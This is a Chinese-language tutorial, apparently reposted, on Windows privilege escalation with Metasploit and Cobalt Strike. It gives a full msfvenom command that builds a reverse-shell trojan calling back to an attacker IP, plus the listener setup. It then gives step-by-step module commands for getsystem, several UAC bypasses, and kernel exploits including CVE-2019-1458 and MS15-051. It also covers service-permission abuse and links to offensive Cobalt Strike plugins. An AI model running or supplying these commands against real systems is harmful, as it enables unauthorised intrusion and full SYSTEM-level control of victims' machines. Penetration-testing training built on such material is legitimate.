MSF/CS框架提权姿势

Meterpreter自动提权

Meterpreter自动提权命令

getsystem：
getsystem是由Metasploit-Framework提供的一个模块，它可以将一个管理帐户（通常为本地Administrator账户）提升为本地SYSTEM帐户

1)getsystem创建一个新的Windows服务，设置为SYSTEM运行，当它启动时连接到一个命名管道。
2)getsystem产生一个进程，它创建一个命名管道并等待来自该服务的连接。
3)Windows服务已启动，导致与命名管道建立连接。
4)该进程接收连接并调用ImpersonateNamedPipeClient，从而为SYSTEM用户创建模拟令牌。
5)然后用新收集的SYSTEM模拟令牌产生cmd.exe，并且我们有一个SYSTEM特权进程。

getsystem只能将administrator账号提权到system账户

1. 生成一个木马。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=171.16.1.109 lport=9999 -f exe -o demo.exe

3. 设置payload。

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 171.16.1.109
set lport 9999
exploit 

5. 上线MSF。
   

getuid：查看当前用户权限，为administrator。可以使用getsystem。

getsystem：提权为system。

bypassUAC

UAC：用户帐户控制（User Account Control），是windows操作系统中采用的一种控制机制，它以预见的方式阻止不必要的系统范围更改。

getsystem提权方式对于普通用户来说是失败的不可正常执行的，那么这种情况下就需要绕过系统UAC来进行getsystem提权。

search bypassuac #查找对应模块

进程注入

use exploit/windows/local/bypassuac
set payload windows/x64/meterpreter/reverse_tcp
set LHOST=攻击机ip
set session 1  # 选择会话
set targets  # 选择架构
exploit

前提目标机器已经上线msf，且用户为管理员组！

1. 使用bypassuac模块。
   

2. 设置架构为windows64。
   

3. 设置参数。

session：查看会话
set session 2：选择会话2
show targets：查看架构选项
set targets：选择目标架构

4. 运行，进行bypassuac提权。
   得到会话后，进入shell，getsystem进行提权，最后getuid查看是否提权成功，可以看到权限有aaa用户改为system用户。
   

内存注入

use exploit/windows/local/bypassuac_injection  #使用bypassuac_injection模块
show options  #查看需要配置参数
set payload windows/x64/meterpreter/reverse_tcp  #设置架构 （具体情况具体分析）
set session 2  #选中session为2的会话
set target 1  #选中target为1的架构
exploit   #运行

通过bypassUAC获取的session可以看到依然是普通权限，可以getsystem进行提权至system权限

getuid  #查看当前用户
getsystem  #getsystem提权
getuid  #再次查看用户，是否为system用户

Eventvwr注册表项

use exploit/windows/local/bypassuac_eventvwr  #使用bypassuac_eventvwr模块
show options  #查看需要配置参数
set payload windows/x64/meterpreter/reverse_tcp  #设置架构 （具体情况具体分析）
set session 2  #选中session为2的会话
set target 1  #选中target为1的架构
exploit   #运行

通过bypassUAC获取的session可以看到依然是普通权限，可以getsystem进行提权至system权限

getuid  #查看当前用户
getsystem  #getsystem提权
getuid  #再次查看用户，是否为system用户

COM处理程序劫持

use exploit/windows/local/bypassuac_comhijack  #使用bypassuac_comhijack模块
show options  #查看需要配置参数
set payload windows/x64/meterpreter/reverse_tcp  #设置架构 （具体情况具体分析）
set session 2  #选中session为2的会话
exploit   #运行

通过bypassUAC获取的session可以看到依然是普通权限，可以getsystem进行提权至system权限

getuid  #查看当前用户
getsystem  #getsystem提权
getuid  #再次查看用户，是否为system用户

Kernel漏洞提权

windows-kernel-exploits(Windows平台提权漏洞集合):

https://github.com/SecWiki/windows-kernel-exploits

优点：省去手动查找的麻烦

缺点：不是所有列出的local exploit都可用

use post/multi/recon/local_exploit_suggester
show options 
set session 8
exploit 

可以看出我们针对目标有7种提权方式，我们随便找两个尝试。

1. 使用cve_2019_1458_wizardopium漏洞进行提权。

use exploit/windows/local/cve_2019_1458_wizardopium
show options 
set session 8
exploit 

成功拿到system权限。

2. 使用ms16_014_wmi_recv_notif漏洞提权。

use exploit/windows/local/ms16_014_wmi_recv_notif
show options 
set session 8
exploit 

可以看到使用该漏洞没有提权成功，我们不要灰心，继续尝试其他的模块即可！

service_permissions(服务权限)

service_permissions模块

use exploit/windows/local/service_permissions
show options
set sessions 11
exploit

getuid查看到username为system权限，说明提权成功！

always_install_elevated

always_install_elevated模块

use exploit/windows/local/always_install_elevated
show options
set sessions 11
exploit

可以看到使用该模块提权失败，尝试其他方式！

Kernel privilege escalation(内核权限提升)

Windows ClientCopyImage Win32k Exploit

适用与win7 win server 2008R2SP1 x64

use exploit/windows/local/ms15_051_client_copy_image
set lhost 171.16.1.109
set session 11
set targets 1 #我的是x64就选择1
exploit

并没有成功，尝试下一个。

ms14_058提权

use exploit/windows/local/ms14_058_track_popup_menu
set session 11
set target 1
exploit

使用ms14_058也没有成功。

Cobalstrike自动提权

Cobalstrike自动提权使用插件往往事半功倍！
分享几个插件：

1. 梼杌

下载地址：https://github.com/pandasec888/taowu-cobalt-strike

2. 黑魔鬼

下载链接：https://github.com/SeaOf0/CSplugins

更多插件可以自行去下载！

这篇好文章是转载于：学新通技术网